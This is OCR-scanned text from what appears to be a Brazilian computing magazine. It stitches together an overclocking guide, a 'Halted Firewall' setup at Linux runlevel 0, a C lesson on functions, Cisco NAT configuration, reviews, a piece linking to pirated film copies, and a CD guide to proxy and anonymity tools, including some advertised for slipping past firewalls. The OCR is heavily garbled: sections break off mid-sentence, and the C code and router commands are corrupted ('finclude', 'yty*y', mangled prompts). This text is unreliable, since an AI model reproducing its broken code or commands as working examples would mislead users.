cléck rge!, o multilitador e o FSB 

e RGE clock queliremos fazer em nosso sistema é bási 


segredo e, 


E 
: 
E 


3; sem 
alteração no hardware; tudo é efetuada na 


própria BIOS e, como E ma permite um Efação tota io 


FSB, no multiplicador e na voltagem, tudo é possível. Com base em 


alguns testes, iremos setar as seguintes configurações de BIOS: 

FSB em 210 MHz e multiplicador 11,5 x 210 MHz, que será o clock 
total e real do sistema. Mas para o processador rodar nesse clock, 
temos de aumentar a voltagem do mesmo; iremos, portanto, 
colocar o processador para rodar em 1.8 V. Isso também se aplica 
à voltagem do chipset e memória: para a voltagem do chipset, 
iremos col -) ar 1.7 V e para a memória, 2.7 V. Vamos salvar as 
alterações e iniciar o micro. Esta etapa exige muita atenção, pois 
após efetuarmos as 


fofa 


alterações devemos sempre ey ESPRSa 
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processador que custa 
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Hip Rj E de: 
> NEPODUCÃO 


Atualmente, todos os administradores de 
sistemas têm de ficar atentos a novas 
vulnerabilidades, participando de listas, lendo 
artigos, atualizando o sistema, sempre em 
busca da segurança perfeita. E-toda vez que se 
toca nesse assunto, lembra-se do velho ditado: 
“O único computador seguro é aquele que 
está desligado”. Foi aí que surgiu a idéia do 
Halted Firewall. 


- Uma Breve Explicação = 


Sistemas Linux podem funcionar em níveis 
distintos de execução. Cada um é caracteriza- 
do pelo conjunto de processos permanentes e 
funções oferecidas. A distribuição Red Hat e 
derivadas utilizam geralmente seis níveis de 
execução ou runlevels, como são mais conhe- 


cidos. 
São eles; 
- Nível O = System Halt 
ível 1 = Single User Mode, para manuten- 


ível 2 = Geralmente vem desativado 
ível 3 = Multiusuário com login no conso- 


ível 4 = Geralmente vem desativado 
ível 5 = Multiusuário com login gráfico 

: Nível 6 = Reboot 

Cada nível de execução é controlado por 
links simbólicos existentes no /etc/re.d/rcX.d, 
onde X indica o seu runlevel. 


Examinando o conteúdo do /etc/re.d/rcO.d 

téls -| 

lrwxrwxrwx 1 root root 19 Aug 7 17:28 
K00linuxconf -> ../init.d/linuxconf 

lrwxrwxrwx 1 root root 15 Aug 5 18:24 
K03rhnsd -> ../init.d/rhnsd 

lrwxrwxrwx 1 root root 17 Aug 5 18:16 


K05anacron -> ../init.d/anacron 


lrwxrwxrwx 1 root root 13 Aug 5 18:14 
K05atd -> ../init.d/atd 

lrwxrwxrwx 1 root root 18 Aug 5 18:14 
K05keytable -> ../init.d/keytable 

lrwxrwxrwx 1 root root 13 Aug 5 18:18 
Kl0x£fs -> ../init.d/x£fs 

lrwxrwxrwx 1 root root 13 Aug 5 18:15 


Kl5gpm -> 
lrwxrwxrwx 1 root 
K15httpd -> 
lrwxrwxrwx 1 root 


EA Serem 


Kl6rarpd -> ../init. 


lrwxrwxrwx 1 root 


--/init.d/gpm 


root 15 Aug 5 18:25 
d/httpd 
root 15 Aug 5 18:26 
d/rarpd 
root 13 Aug 5 18:23 


K20nfs -> ../init.d/nfs 
lrwxrwxrwx 1 root root 16 Aug 5 18:25 
K20rstatd -> ../init.d/rstatd 
lrwxrwxrwx 1 root root 17 Aug 5 18:25 
-./init.d/rusersd 
lrwxrwxrwx 1 root root 16 Aug 5 18:25 
K20rwalld -> ../init.d/rwalld 
lrwxrwxrwx 1 root root 15 Aug 5 18:24 
K20rwhod -> ../init.d/rwhod 
lrwxrwxrwx 1 root root 15 Aug 5 18:26 


K20rusersd -> 


K25squid -> ../init.d/squid 

lrwxrwxrwx 1 root root 14 Aug 5 18:25 
K25sshd -> ../init.d/sshd 

lrwxrwxrwx 1 root root 18 Aug 5 18:16 
K30sendmail -> ../init.d/sendmail 

lrwxrwxrwx 1 root root 19 Aug 5 18:25 
K34yppasswdd -> ../init.d/yppasswdd 

lrwxrwxrwx 1 root root 19 Aug 5 18:25 
K35vncserver -> ../init.d/vncserver 

lrwxrwxrwx 1 root root 20 Aug 5 18:16 
K44rawdevices -> ../init.d/rawdevices 
lrwxrwxrwx 1 root root 15 Aug 5 18:26 
«./init.d/named 

lrwxrwxrwx 1 root root 15 Aug 
K46radvd -> ../init.d/radvd 


lrwxrwxrwx 1 root root 15 Aug 


K45named -> 
18:24 


18:24 
K50snmpd -> ../init.d/snmpd 
lrwxrwxrwx 1 root root 13 Aug 
K50tux -> ../init.d/tux 
lrwxrwxrwx 1 root root 16 Aug 
K50xinetd -> ../init.d/xinetd 
lrwxrwxrwx 1 root root 15 Aug 
K60crond -> 
lrwxrwxrwx 1 root root 13 Aug 
K601pd -> ../init.d/lpd 
lrwxrwxrwx 1 root root 16 Aug 
K65identd -> ../init.d/identd 


18:26 
18:20 
18:16 
-./init.d/crond 


18:17 


18:24 
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lrwxrwxrwx 1 root root 16 Aug 5 18:23 K72autofs -> 
-/init.d/autofs 

lrwxrwxrwx 1 root root 14 Aug 5 18:16 K74apmd -> 
./init.d/apmd 

lrwxrwxrwx 1 root root 14 Aug 5 18:19 K74ntpd -> 
./init.d/ntpd : : 

lrwxrwxrwx 1 root root 16 Aug 5 18:25 K74ypserv -> 
.Jinit.d/ypserv ” 

lrwxrwxrwx 1 root root 16 Aug 5 18:25 K74ypxfrd -> 
«./init.d/ypxfrd 

lrwxrwxrwx 1 root root 15 Aug 5 18:16 K75netfs -> 
-/init.d/netf£s 

lrwxrwxrwx 1 root root 16 Aug 5 18:16 K80random -> 
«/init.d/random 

lrwxrwxrwx 1 root root 17 Aug 5 18:23 K86nfslock - 
> «./init.d/nfslock 

lrwxrwxrwx 1 root root 17 Aug 5 18:20 K87portmap - 

> .«./init.d/portmap = 
lrwxrwxrwx 1 root root 16 Aug 5 18:14 K88syslog.-> 
-«/init.d/syslog 


Note que todo o conteúdo deste diretório se constitui de links 
simbólicos que apontam para scripts dentro de /etc/re.d/init.d. A 
primeira letra indica se o processo para o qual aponta deve ser 
à ativado ou desativado. Se for 'S'(started), é ativado; se for “K" 
à (killed), é desativado. Os números seguintes indicam a sua ordem. 


Como foi visto, ao desligarmos o computador, transformamos o 
runlevel corrente (geralmente 3 ou 5) no runlevel 0. Ao digitar init 
O ou halt na máquina, o sistema executará todos os scripts em / 
etc/rc.d/rcO.d, automatizando esse processo. 

A idéia do Halted Firewall é fazer com que o firewall continue 
filtrando os pacotes em runlevel O. 

Conseguentemente, teríamos um sistema sem discos montados 
e sem nenhum processo rodando, dificultando, assim, a ação de 
um invasor. 

Tendo removido todos os processos, o invasor não teria como 
E ganhar acesso à shell. Dessa forma, não poderia executar códigos 
no sistema, além daquele que fosse introduzido diretamente no 
E espaço do kernel. Isso exigiria a escrita do código de shell para 
produzir os resultados desejados. 


- Implementação 


Para montar um Halted Firewall foram utilizados: um computa- 
dor com processador Pentiumil 500Mhz, 128Mb de memória, uma 
a de rede da 3Com e um HD de 10Gb. O sistema 
implementado foio Red Hat 7.2 (kernel 2.4.XX), por ser uma 
distribuição GNU/Linux mais utilizada. O firewall aplicado no teste 
foi o iptables, bastante conhecido na área de segurança. 

Como a intenção é desligar a máquina, mas manter a rede 


ligada e o firewall ativo, devemos remover os seguintes links do init O: 
/etc/rc.d/rc0.d/S0lhalt 
/etc/rc.d/rc0.d/S00killall 
/etc/rc.d/rc0.d/K90network 
/etc/rc.d/rc0.d/K92iptables 


Com a retirada deles, a máquina no runlevel O manteria 
iptables e rede ligados, pois os seus respectivos links K90network 
e K92iptables foram removidos e esses processos não serão 
finalizados nesse run level. 

A remoção do S00killall e S01halt foi necessária porque sua 
função é percorrer recursivamente o /etc/re.d/rcO.d/ e rodar todos 
os scripts que começam com K, incluindo, assim, os links 
K90network e K92iptables, ocasionando a falha do teste. 


= Vantagens 


A principal vantagem é a dificuldade que um atacante encon- 
trará para invadir o seu firewall, porque quanto menos processos 
e menos portas abertas, menor a chance de isso acontecer. Como 
num Halted Firewall a máquina só teria kernel, rede e iptables 
rodando, nosso “amigo” não terá muitas opções. 

Sobre ataques DoS e DDos, que hoje são um grande problema, 
o Halted Firewall reagiu de forma normal ou até um pouco 
superior, comparando a um firewall iptables numa máquina 
normal. 


- Desvantagens 


Sem dúvida, o maior problema do Halted Firewall é a dificulda- 
de de se acrescentar regras. Como a máquina está no run level 0, 
o único meio de adicionar novas regras é desligando fisicamente a 
máquina. 

Conseguentemente, a necessidade da presença física do 
administrador é, para muitas empresas, um grade empecilho, pois 
a maioria delas faz a adição de regras pela rede ou o próprio a 
(Intrusion Detection Systems) cumpre essa tarefa. 

O Halted Firewall, portanto, não é recomendado para ser 
colocado antes de um servidor HTTP, por ser o mais visado pelos 
scripts kiddie e defacers, exigindo, assim, a necessidade constante 
de adição de regras. : 


Apesar das desvantagens apresentadas, essa implementação de 
firewall é bastante interessante. Dependendo da criatividade de 
cada administrador, é possível aplicá-lo com mais recursos como, 
por exemplo, ativação de logs. Nesse caso, o administrator teria 
que estudar bem os scripts contidos no /etc/init.d e modificá-los de 
acordo com sua necessidade. 

Os testes aqui apresentados foram bem simples para reviver 
uma idéia antiga de se utilizar um firewall num sistema teorica- 
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Curso de C - Terceira Lição - Funç 


Introdução 


Olá a todos, estamos aqui para nossa terceira 
lição do curso de C para Linux. Depois de vermos 
alguns tópicos básicos nas nossas duas lições 
iniciais, vamos abordar agora um tema muito 
importante: as funções. Elas são a base da 
programação modular e possibilitam que nosso 
programa fique muito melhor, permitindo um 
grau de recursividade enorme e a extensão com 
novas funcionalidades. 


Quando escrevemos um programa em C, é 
comum combinar novas funções com outras 
prontas, disponíveis na biblioteca padrão do C, 
Como assim?:O C já vem com funções prontas do 
tipo a raiz quadrada de um número (sgrt(x); elas 
são funções matemáticas e já vêm dentro da 
linguagem. Uma outra função é a printf, que 
utilizamos em nossas duas lições iniciais. O 
interessante é que um programador em C pode 
criar as suas funções a partir das existentes. 


Contudo, as funções precisam ser ativadas 
(invocadas) a partir de uma chamada de função. 


Entendendo uma função 


Vamos analisar o programa acima, ou melhor, 
entender alguns de seus pontos. A linha int 
eleva cubo(int); contém o que chamamos de 
protótipo da função, ou seja, o nome da função 
(eleva cubo), seguido pelo parêntese e o 
argumento da função (no caso, uma variável do 
tipo int). Podem existir mais de um argumento 
em uma função e, caso isso ocorra, eles deverão 
estar separados por vírgula. 


Depois, no meio do programa, temos a 
chamada da função: 


eleva cubo(x) 

Ou seja, eu estou invocando a função = 
antes, eu declarei uma variável int com o valor 
9. Agora irei fazer o cubo de 9. No final, temos 


a função propriamente dita : 


int eleva cubo(int y) 


A chamada de função especifica o nome da função e seus 
argumentos. A partir daí, podemos designar o que ela irá fazer. 


Vamos ver o exemplo abaixo 
finclude <stdio.h> 


int eleva cubo(int); /* a funcao ou seu prototipo 


REA 
main() 
int x=9; 
printf (“Valor ao cubo: %d “eleva cubo(x)); 
return 0; 
/*Definindo a funcao 
int eleva cubo(int y) 


return y*y*y; 


Compile e execute e veja o que acontece 


return yty*y; 


Note que eu declaro aqui uma variável y. Esta variável é 
proprietária da função, ou local da função. Repare que declaro a 
função com int, o que significa que o valor de retorno (no caso, o 
cubo do número) deverá ser inteiro. Não foi por acaso que, no 
protótipo da função, eu declarei o aceite de valores inteiros 


Agora, um outro ponto importante: o retorno da função. 
Observe o comando abaixo: 


return y*y*y; 


Eu estou retornando o cubo de y, mas o que significa retornar? 
Quando a função termina, a mesma deverá retornar um valor, ou 
seja, 9 elevado ao cubo, que é 729. Agora, uma função pode não 
retornar valores? A resposta é sim. Quando uma função não 
recebe nenhum valor, a lista dos parâmetros é void, Outro ponto: 
se no protótipo da função você declarou um tipo int, na função 


erro bobo, que causa uma enorme dor de cabeça na depuração 
de programas 
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Arquivos de cabeçalho ] 


| Um.ponto muito importante e para o qual as pessoas não 

| atentam muito é o chamado arquivo de cabeçalho. Por exemplo, 
desde o início de nosso curso estamos utilizando um arquivo de 
cabeçalho conhecido como <stdio.h>. Toda vez que iniciamos um 
programa, nós declaramos o seguinte 


finclude <stdio.h> 


Mas o que isso significa? A stdio.h contém os protótipos de 
funções do tipo entrada e saida, ou seja, funções como printf, 
scanf, etc. Se não colocássemos essa declaração no início do nosso 
programa, o compilador não saberia utilizar essas funções! Em 
outras palavras, para ele, tais funções não existiriam e, portanto, 
precisariamos incluí-las para que pudéssemos aproveitar os 


que tem protótipos para urilização em programação com sockets. 
Normalmente, os arquivos de cabeçalho ficam no diretório /usr/ 
include, e o compilador sabe que os mesmos estão por lá. 


Mas uma pergunta deve ter ficado no ar: podemos criar nossos 
arquivos de-cabeçalho pessoais? Mas é claro que sim! Normalmen- 
te, grandes programas fazem isso. Porexemplo, no exemplo 
acima faríamos o seguinte: 


*include <stdio.h> 
include “eleva cubo.h”; 


main() 


int x=9; 
printf (“Valor ao cubo: &%d “,eleva cubo(x)); 


return 0; 


Salvariamos o programa como cubo.c e, em seguida, criariamos 
um arquivo como:o nome eleva cubo.h no-mesmo diretório do 
cubo.c 


int eleva cubo (int); 


A 


/* a funcao ou seu prototipo 


/*Definindo a funcao 

int eleva cubo(int y) 

return y*y*y; 

Compile o programa (gcc -o cubo cubo.c) e rode; 
agora, você terá seu próprio cabeçalho de funções. 


Dentro deste, você pode ter várias funções. Por 


exemplo, para o arquivo acima, faça o seguinte: 


int eleva cubo(int); 
“4 


/* a funcao ou seu prototipo 


/*Definindo a funcao 
int eleva cubo(int y) 


return y*y*y; 


int eleva quadrado(int); /* a funcao ou seu 


prototipo */ 

/*Definindo a funcao 

int eleva quadrado (int y) 

return y*y; 

Salve-o como minhas funcoes.h e modifique o 
programa acima 


Finclude <stdio.h> 


include “minhas funcoes.h”; 
main() 


int x=9; 
printf (“Valor ao quadrado: %d 
“,eleva quadrado (x)) ; 
printf(“Valor ao cubo: %d “,eleva cubo(x)); 


return 0; 

Salve-o como calcula.c e compile-o. Viu que bacana? Temos o 
nosso próprio arquivo de cabeçalho! 

Um exemplo clássico de função: o programa fatorial 

Vamos agora fazer um programa que faça o fatorial de um 
número. Um fatorial de um inteiro não-negativo é feito da 
seguinte maneira: 


nt = n*(n-1)*(n-2)*. ..*2 


Poderíamos fazer isto com um simples for, mas vamos criar um 
programa que faça o fatorial utilizando uma função: 


/*Programa fatorial*/ 


finclude <stdio.h> 
long fatorial (long); /*prototipo da função*/ 


main() 


int x; 


for (x=1; x<=10; x++) 


printf(“$2d! = sid”, x, fatorial(x)); 


return 1 
return (y*fatorial(y-1)); 


else 
Veja como podemos utilizar uma função de maneira simples e 


direta para que possamos fazer os mais diferentes programas. 
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i 
Vamos propor o seguinte desafio para voc 


long fatorial (long y) 
1) 


return 0; 


/*De£ 
programa que calcule a somatória de 6 


deles e, em seguida, o total. Faça uma 
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CONFIGURANDO 
NAS EM 
ROTEADORES 


CISCO 


Internet é uma grande teia de hosts interconectados. 

Todos os dias, milhões de usuários conectam-se à ela. 

Para que você tenha esse acesso, faz-se necessário uma 
identificação, que é feita por intermédio de um endereço IP. 
Quando o endereçamento IP foi criado, no caso, o IP versão 4, ou 
IPv4, acreditava-se que haveria endereços de sobra, talvez por 
não acreditarem que a Internet se massificaria tão ferozmente 
em nossa atualidade. A maior preocupação da comunidade da 
Internet passou a ser o esgotamento total dos endereços IP, 
tamanho o ritmo de crescimento da estrutura. Além disso, ocorre 
um enorme desperdício de endereços IP, especialmente por parte 
de grandes empresas que alocaram grandes blocos de endereços 
inutilmente. Para resolver isso, a organização Internet Assigned 
Numbers Authority (IANA) especificou, por meio da REC 1918, uma 
faixa de endereços dentro das três classes de IP existentes (A, Be 
C), determinando que esses endereços seriam privativos ou 
reservados e não roteados pela Internet. Portanto, as empresas 
podem utilizar esses endereços na sua rede interna, economizan- 
do assim endereços válidos (roteáveis) da Internet. 


= — Estes endereços são: 
Classe A: toda a faixa do endereço 10.0.0.0 ao 10.255.255.255 


Classe B: toda a faixa do endereço 172.16.0.0 ao 
172.31.255.255 


Classe C: toda a faixa do endereço 192.168.0.0 ao 
192.168.255,255 


Devido à escassez de endereços válidos, soluções como endere 
ços privativos, CIDR, VLSM e NAT foram incorporados à infra- 
estrutura da Internet, tornando possivel alocar os endereços IP de 
forma mais eficiente até a chegada total da nova versão de IP, o 
IPv6, que resolverá por completo este problema. Mas como isso 


parece estar um pouco longe de acontecer, veremos como 
resolver essa questão com a tradução de endereços IP, ou NAT. 


O Network Address Translator (NAT) traduz os endereços que 
entram ou saem de um roteador, dependendo da forma da 
implementação e configuração para tradução desses endereços. 
Esse processo pode ser visualizado na figura abaixo: 


REDE LOCAL 
192.168.1.0/24 
INTERNET: 


REDE EXTERNA] 


213.18.123.100 


Figura 1 - Nossa topologia de configuração básica 


Esta configuração pode ser feita de duas formas: cada endere- 
ço IP de sua rede interna será mapeado para um endereço válido 
do conjunto de IPs válidos designados para a sua empresa. É claro 
que esse modelo em nada resolve o problema de desperdício de 
endereços válidos. Basta pensar que, se você tivesse 150 endere- 
ços privados na sua rede, você precisaria de 150 endereços 
válidos. 


A outra forma é o sentido inverso da conexão: mapeando um IP 


válido para um privativo. 
>>>>NAT dinâmico 


Neste modelo, todo o mapeamento dos endereços privativos 
para os IPs válidos ocorre de forma dinâmica. O roteador criará a 
tabela de traduções automaticamente, mas ainda teremos o 
problema-do desperdício, pois o mapeamento é de um para um. 


Figura 2 - NAT Dinâmico 


>>>>NAT dinâmico e overinading 


Segue o mesmo funcionamento do anterior, sendo que a única 
diferença é que estaremos agora compartilhando um único 
endereço IP válido. O roteador irá atribuir uma porta de conexão 


deorigem para cada tradução efetuada, a fim de, com isso, saber 


para qual endereço privado deve ser retornado o pacote. Esse 
método é conhecido como tradução de endereços por porta, ou 
“port level multiplexed NAT”, e será adotado na configuração do 
nosso roteador 


CONFiGUPANDO O NAT 


Vamos demonstrar como configurar nossa rede tendo 
como modelo a topologia adotada da Figura 1 e, como base, 
um roteador CISCO modelo 2501. 


O que faremos agora será traduzir os endereços 
192.168.1.X/24 para o endereço IP configurado na interface 
serial conectada à Internet. 


Partindo do princípio de que o usuário já tenha configura- 
do corretamente o encapsulamento e as interfaces do 
roteador com os IPs, partiremos para a tradução dos 
endereços. Para adaptar o exemplo ao seu caso, basta 
substituir o IP 213.18.123.100 pelo o seu IP de 
acesso à Internet. 


1º Passo: Configurar o NAT da rede interna para 
definir qual endereço de origem deverá ser traduzido 

Router-Riofconfigure terminal 

Router-Rio(config)% ip nat pool INTERNET 
213.18.123.100 213.18.123.100 prefix- 
length 24 


Router-Rio (config) £ 


ip nat inside 


list NAT pool INTERNET overload 


source 


2º Passo: Configurar a lista de acesso para infor- 
mar quais os IPs da sua rede interna deverão ser 
traduzidos. 


Router-Rio(config)tip access-list 
standard NAT 

Router-Rio(config-std-nacl)f permit 
192.168.1.0 0.0.0.255 

Router-Rio(config-std-nacl)fexit 


3º Passo: Ativar o NAT nas interfaces corretas, 


Router-Rio(config)% interface ethernet 0 


Router-Rio(config-if)f ip nat inside 
Router -Rio(config-if)texit 
Router-Rio(config)finterface serial 0 
Router-Rio(config-if)fip nat outside 
Router-Rio(config-if)gexit 
Router-Rio(config)tfexit 


Router-Riof 


4º Passo: Utilize o comando abaixo para verificar a 
configuração do NAT. 

Router-Riof show ip nat statistics 

5º Passo: Use o comando ping para testar a 
configuração do NAT. 


6º Passo: Podemos observar a tradução com o 
comando * show ip nat translations. 


Neste artigo, vimos o básico para a configuração 
de um NAT dinâmico. No próximo, irei explorar os 
conceitos de NAT estático e com tradução de portas 
- uma solução excelente para usuários de banda 
larga. Até lá... 


podendo ser baixado diretamente do site oficial em versão DivX. 


Esse é o espírito de “Hippies From Hell”, primeiro filme do projeto Waag Connect, criado pela 
Waag Society para oferecer ao público um espaço de rede pública cultural e experimental. 

O longa em si é bastante simples, mas consegue mostrar bem a ligação entre o movimento 
hacker e o espírito hippie dos anos 60. Enquanto cada integrante do grupo é apresentado, 
todos eles aparecem de cara limpa na frente das câmeras, sem medo das autoridades. Até mesmo um que já foi preso duas vezes por 


invadir sistemas. 


Só mesmo na Holanda. Um documentário sobre hackers, divulgado livremente pela Internet, 


Um ponto bastante abordado é o lockpicking, prática bastante popular na Holanda e na Alemanha. Vários “hackers analógicos” 
ficam competindo para ver quem consegue abrir mais rapidamente uma fechadura usando apenas um pedaço de ferro. O impressio- 


nante é ver que alguns conseguem em poucos segundos. 


Outro momento marcante: no final do filme, uma sessão de queima de manuais, representando um estímulo à atitude hacker de 


descobrir as coisas fuçando. 


Não faltam cenas de eventos hackers, festas realizadas pelo grupo e até mesmo sessões de lockpicking nudistas. A idéia é sempre 
promover a liberdade, que parece muito mais presente por lá do que do outro lado do Atlântico. Em dado momento, no entanto, 


policiais aparecem para “acompanhari-uma 
ao governo”. 


convenção. As autoridades, então, negam ter se referido aos hackers como “ameaças 


Como diz um hacker americano que aparece no documentário, citando a lei DMCA (que coíbe a publicação de experimentos envol- 
vendo decriptação de sistemas), “nos EUA, as pessoas podem ser processadas por descobrir coisas. Isso é muito perigoso”. Realmente. 
Pelo jeito, todos temos muito a aprender com a Holanda, começando por filmes como esse. 


Para assistir ao documentário, baixe o arquivo no site Attp:/hippies.waag.org 
(33MB1 Hi-res, 234MB Lo-Res) 


O mundo está reduzido a uma confusão ideológica, e isso se reflete 
na vida dos indivíduos, que acabam não sabendo o que é sonho, delírio 
e realidade. Não sou eu quem falo isso, mas os autores de ficção 
científica das décadas de 80 e 90. Ocorreu uma mudança tão grande 
em relação à ficção científica feita até a época pré-lnternet, que até 
um novo nome foi criado para eles (na verdade, eles mesmos se 
autodenominaram): cyberpunks. Punks porque seus personagens 
agem fora da lei, ou no limite dela; cyber porque toda a revolução da 
informática e da cibernética está presente nas novelas e contos. 

Nessa vertente, há uma mistura muito estranha entre os valores e 
sonhos dos hippies dos anos 60, o desespero e a falta de perspectivas 
dos punks da década de 70, o consumismo e materialismo (no mau 
sentido) dos yuppies dos anos 80 e o libertarismo e rebeldia dos 
hackers dos anos 90 - tudo isso embalado em uma pseudoliteratura 
renovadora. 

Ao misturar delírio com ciência, os cyberpunks foram rechaçados 
pelos próprios amantes da ficção científica, o que é difícil de acreditar, 
embora seja verdade. 

Futuro Proibido é uma coletânea de contos antiga, feita pela revista 
Semiotext(e) em 1989, que somente chega agora ao Brasil. Nesses 
quase 10 anos que separam as duas edições, muita coisa aconteceu, 
até mesmo a decretação da morte do movimento cyberpunk. 

Agora, uma coisa é preciso dizer: a distância entre a teoria e a 
prática é gigantesca. Quer dizer, partindo de uma idéia extremamente 
interessante de renovação conteudística da literatura, chega-se a uma 
prática pouco criativa, monótona e, até mesmo, conservadora. 

A maioria dos contos selecionados tem pouco a acrescentar à 
literatura, sejara de ficção científica, seja ela como um todo. As 
histórias se repetem, mostrando um mundo, no geral, caótico, e tudo 


é mostrado de forma superficial e 
bastante óbvia. 

É isso que mais fica evidente nas 
histórias, com seus personagens 
pouco profundos, banais até. 
Muitos podem dizer que essa é a 
realidade do mundo de hoje (e até 
eu poderia concordar com isso), 
mas o problema é que essa 
banalidade não cria boa literatura 

E o pior é que os chamados 
“papas” da literatura cyberpunk 
são exatamente os que mais 
desapontam, como Bruce Sterling, 
William Gibson e Sol Yurick, que 
mostram um festival de 
obviedades. Já o grande William 
Burroughs, que nem forçando se encaixa no mundo cyberpunk, é o 
ponto alto da coletânea, apesar de participar com apenas dois 
pequenos contos. 

A editora Conrad ainda pretende lançar o segundo volume da 
coletânea. Esperemos para ver se existem outros autores que fogem 
das soluções óbvias e conseguem criar histórias que respondam 
verdadeiramente a estes tempos pós-modernos. Todos os elementos 
para criar boas narrativas estão ali, é só romper com o 
conservadorismo e partir para as experimentações na forma. Só assim 
veremos coisas realmente inovadoras. 

Futuro proibido 

Vários autores 
Editora Conrad 
R$ 29,00 


FUTURO 
PROIBIDA 


Pty ache Bob Set sto 
Peter Lara it 


Porjoão Marinho 
joaoQdigerati com.br 


Será que o Brasil é de fato uma democracia? Para a maior parte da popula- 
ção, a resposta Óbvia é “sim”. Mas há quem aponte sinais evidentes de que 
existe um apurado controle sobre a liberdade das pessoas 

Entre esses sinais, poderíamos citar, como exemplo, o fato de o filme Amor, 
Estranho Amor permanecer proibido no Pais. Trata-se de uma produção de 1982 

em que Xuxa interpreta uma prostituta que seduz um menininho pré-adolescente. 

Outro filme “proibido”, que também mexe com uma figura global, é Muito Além do Cidadão Kane (Brazil: Beyond Citizen Kane), 
documentário dirigido por Simon Hartog, produzido pela BBC e exibido em Londres, em 1993 Aqui, os protagonistas são as Organiza 
ções Globo e o recém-falecido Roberto Marinho 

Na época, a emissora tentou durante meses, por intermédio da Justiça, evitar a veiculação do filme, mas perdeu. E poucos dias 
depois da exibição em Londres, o MIS - Museu da Imagem e do Som de São Paulo - conseguiu uma cópia pirata. programou várias 
sessões do documentário, que foram canceladas pelo então secretário de Cultura do Estado, Ricardo Ohtake 

A versão oficial é que o cancelamento ocorreu porque a fita era pirata, mas, segundo 
Geraldo Anhaia Melo, jornalista e, na época, programador do MIS, houve uma interven- 
ção direta de Roberto Marinho com o governador e o secretário de Cultura. Seja como 
for, o fato é que, misteriosamente, Muito Além do Cidadão Kane continua inédito no 
Brasil. Várias exibições foram feitas posteriormente, é verdade, mas todas eram 
frutos de pirataria. 


E por que Roberto Marinho se preocuparia tanto em evitar a exibição do filme? Ué, 
pelo conteúdo sensivel! Tive acesso a uma das cópias, e não vou dizer onde e nem como 
para não comprometer outras pessoas. Simplesmente, Muito Alémdo Cidadão Kane, 
cujo nome faz referência a uma produção sobre outro magnata das telecomunicações 

(Cidadão Kane), destrincha toda a história da Rede 


Globo, desde que Marinho herdou o jornal de 
seu pal. 

As manobras para “regularizar” o investimento feito pelo grupo americano Time-Life (o que era 
proibido pela legislação brasileira), o serviço prestado à promoção da ditadura, a histórica edicão 
do debate entre Lula e Collor (que deu vantagem a este último), a forma como a Globo se 
beneficiou do cancelamento de concessões como as da TV Excelsior, gue deixou de existir 
exatamente por causa da oposição aos militares... Tudo isso está | 

Ainda só é possível conhecer verdadeiramente a Globo recorrendo a softwares como KaZaA fojd] 

Morpheus, ou por intermédio de alguns sites 
corajosos da Web. Abaixo, indicamos dois links e um 
livro, escrito por Anhaia Mello. Vale a pena fazer o 
download, ler o livro e descobrir que há, sim, muita 
coisa por trás do sucesso das telenovelas e do 


Jornal Nacional 


http://caid sites.uol.com.br/ 
index citizenkane.him 
http:/Aw divxmovies.com/community/ 


listMovies.php2handle=r 


MELLO, Ger Muito além do cidadão 


Paulo: Scritta Editorial, 1994 


GUIA DO CD 


As técnicas de Stealth são muito variadas, mas têm um objetivo em comum: preservar sua privacidade na Internet. Pa 


isso, são usados programas para conectar seu micro em servidores Proxy anônimos e em “túneis 


HTTP que escondem 


seus dados de mecanismos de rastreamento. Se a idéia lhe agradou, conheça os principais softwares presentes na 


categoria Stealth do CD desta edição, e escolha um pa 


de 


ProxyChecker 3.27: Este programa permite a checagem da lis 


proxies com diversos recursos. Vo conferir proxies anônimos, 


proxies separados, além de ou 


MultiProxy 1.2a: Com este proxy, navegue anonimamente e acelere a 


conexão em certos casos. O programa possui uma lista bem extensa de 


ada.no site do 


servidores, que pode ser periodicamente atua 
desenvolvedor. Para fazê-lo funcionar, é necessário ajustar as configurações 
de proxy no Internet Explorer e em outros programas de navegação para 
127.0.0.1, porta 8088 


The Proxomitron 4.5: Filtra janelas pop-up, propagandas em forma de 
banners, entre outras coisas irritantes que muitos webmasters insistem em 
pôr em seus sites. Funciona como um proxy na sua máquina. Para usá-lo nas 


conexões HTTP, você só precisa configurar o browser 


Filetopia Bouncer: Para usuários que utilizam a rede de peer-to- 
peer Filetopias. Esconde o seu IP, garantindo mais segurança na troca 


de arquivos 


Proxy Server List Hunter 1.78: Procura por vidores proxy anônimos 


e grátis. Permite que você escaneie proxies abertos (incluindo HTTP e Socks) 


e envie e-mails e socks para ICQ e AIM. Ainda testa a velocidade dos 


servidores. Obs.: É necessário possuir o Microsoft .NET Framework instalado 


em sua máquina 


HTTP Port 3: Cria um IP anônimo para acessar qualquer serviço da 


Internet sem ser identificado 


HTTP Tunnel 2.3: Use o ICQ e outros programas de mensagem Sem que 


servidores e firewalls o detectem 


Surf Secret : Navegue pela Internet tranquilamente. Este programa 
apagará os rastros deixados pelo browser. Obs.: Necessário estar conectado. 


à Internet na hora da instalação para a sua conclusao 


zelar pelo seu anonimato na Web. 


Anonymity.4 Proxy 2.52: Faz com que você navegue e participe de chats 


sem ser identificado, sendo um intermediário entre o browser e a Internet 


Check Proxy v3.20: Encontre servidores de proxies anônimos rapidamente 


Clean Space 8.24: O programa realiza uma varredura, eliminando 
vestígios de cache e históricos dos seguintes programas: ICQ 2002a, 
Morpheus, ACD See, GetRight 4.5, KaZaA Media Desktop, WinZip, AOL 
Instant Messenger, Google Toolbar, WinRAR, Download Express, RealOne 


Player, Netscape, IE, Microsoft Office, além do próprio Windows 


Socks2HTTP Beta 0.96: Converta requisições socks5 para HTTP, de 


modo a driblar o firewall. O programa é utilizado nas mais diversas 


aplicações, como Morpheus, MSN Messenger, ICQ, AOL IM, FTP, Telnet, etc 


CGlProxy 2.0.1: Script em CGI que simula um servidor proxy anônimo 


Invisible IRC Project: O IIP (Invisible IRC Project) é um programa que permite 


que o usuário utilize a rede de bate-papo do IRC com segurança e anonimato 


Libra FTP daemon 1.3.4: Sevidor de FTP anônimo para Linux. Suporta 


todos os tipos de comandos convencionais. Esta versão já suporta IPv6 nativo 
AnonyNews: Muito parecido com um servidor de noticias comum, com 
apenas uma diferença: todas as mensagens que forem postadas não 


identificarão quem postou 


cloudish 1.41: Este software foi desenvolvido para que o usuário possa 


navegar anonimamente pela Web. Possui dois tipos de configurações: a 


sitandalone e a distributed. Configurado para a distributed, a navegação é 


muito mais anônima 


Anonymous Network Project: Uma rede peer-to-peer baseada no 


modelo PipeNet. Constrói dinamicame: úneis encriptados e com uma série 


de nós de rede. Com ele, você fica anônimo ao se conectar na Rede 


JL) cus , 


Key Logging 
O Grande irmão 

Registrar tudo aquilo que é digitado em um 
